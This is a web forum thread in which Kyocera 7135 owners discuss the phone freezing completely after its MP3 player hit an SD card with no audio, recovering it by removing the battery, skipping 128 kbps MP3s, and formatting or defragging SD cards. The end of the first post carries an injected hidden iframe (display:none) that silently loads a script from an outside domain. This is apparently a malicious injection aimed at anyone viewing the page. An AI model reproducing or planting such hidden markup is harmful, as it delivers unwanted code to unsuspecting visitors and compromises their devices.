+ Reply to Thread

Sudden Temporary Death of My 7135

I just had my 7135 do a great impersonation of a dead phone. It began when I put in the SD card that I thought had my MP3s on it and started the MP3 player. I immediately got the reverse screen of death. I realized that I had put in the wrong SD card. Since I had found before that the MP3 player would cause the reverse screen if there were no audio files to be found, I did not panic. I tired to do a soft reset (which is what normally worked) and that's when things went south. I got no response and the phone stayed off. None of the buttons would do anything and nothing would turn the phone or pda on. The screen was blank. I swapped batteries, still nothing. I put the phone in the cradle and got no response. Not even the beeping and blinking red light that I normally got when I put it in or took it out of the cradle. It was dead. Now I began to panic. Finally, I took the battery out and left it out for a few minutes. When finally put the battery back in, the phone came back on with a hard reset.

Fortunately, I had backupbuddy. Unfortunately, I had not backed up for several days. (There is a lesson there. Nightly backed ups for me from now on.) Anybody have a similar experience with the MP3 player or have the phone go totally dead for a few minutes?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I have had the reverse screen once while sending more songs to the card. and had to do a reset. Now I cant download at all. When I start the download manager(Kyocera mp3 desktop) it says getting list of songs and all I get is many pages ( real small scroll bar) and nothing is there but garbage. At this point the program stops responding. I have deleted the the playlist file from the card and let the phone create a new one and it will play the songs on the card, but no more mp3 desktop since that first reverse screen..

Originally posted by TCruz
    I ...no more mp3 desktop since that first reverse screen..
    That is not good. I am back able to play the MP3s, but my 128kbs songs now skip, when they did not before. What still most worries me was the fact that I got nothing until I left the battery out for awhile. I couldn't even fo a reset. I hope this is a one time problem.

Its not unusual for the battery to have to be removed for a minute or more before the "put it in the cradle with no battery" trick will work. Happened to me today.

Also I've ALWAYS had occasional little glitches in my 128 kbps MP3's. But then again, I've NEVER used MP3 desktop to load my MP3's onto the SD card. I wonder if the little glitches would disappear if I used MP3 desktop? Or if they would disappear at a lower bitrate?

I don't use the MP3 downloader. Prior to this, I had no problem with my 128kbs MP3s. I am going to try to figure out where the problem is.

The part that really bothers me about the 7135 playing dead is what do I do if it happens and I am not near a cradle. I hope just pulling the battery for a few minutes, and then reinserting it, will work to clear the freeze.

One thing to keep in mind is that the SD card will need to be scanned for errors and defragged every so often, especially if you are into a lot of MP3s on your SD card. I was having many errors recently, and I reformatted my card and defragged it. Got rid of a lot of lockups (but not all).

Are u using windows to defrag or is there a way to do it with the phone. I know I saw format in 1 of the phones menus?

I just got a multimedia reader to see if that would help. It appears you can only put a small number of mp3s in at a time 16 or so. Has anyone else noticed this.

I haven't had a problem with putting more than 16 MP3s on the card at a time. I just got a new 256mb SD card and formatted it in the phone and then using the Cruzer that it came with to dump a bunch of MP3s and photos onto the card. Seems to work just as well as the MMC card I have done the same with.

Just make sure you format any cards with the phone, not your computer.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

I think I might have a bad card. It was doing some funny things in my camera also.

I format and defrag and scandisk the card using Windows 2000 or Windows XP. Works fine and I think it's the suggestion from Sandisk's website to fix corruption on cards.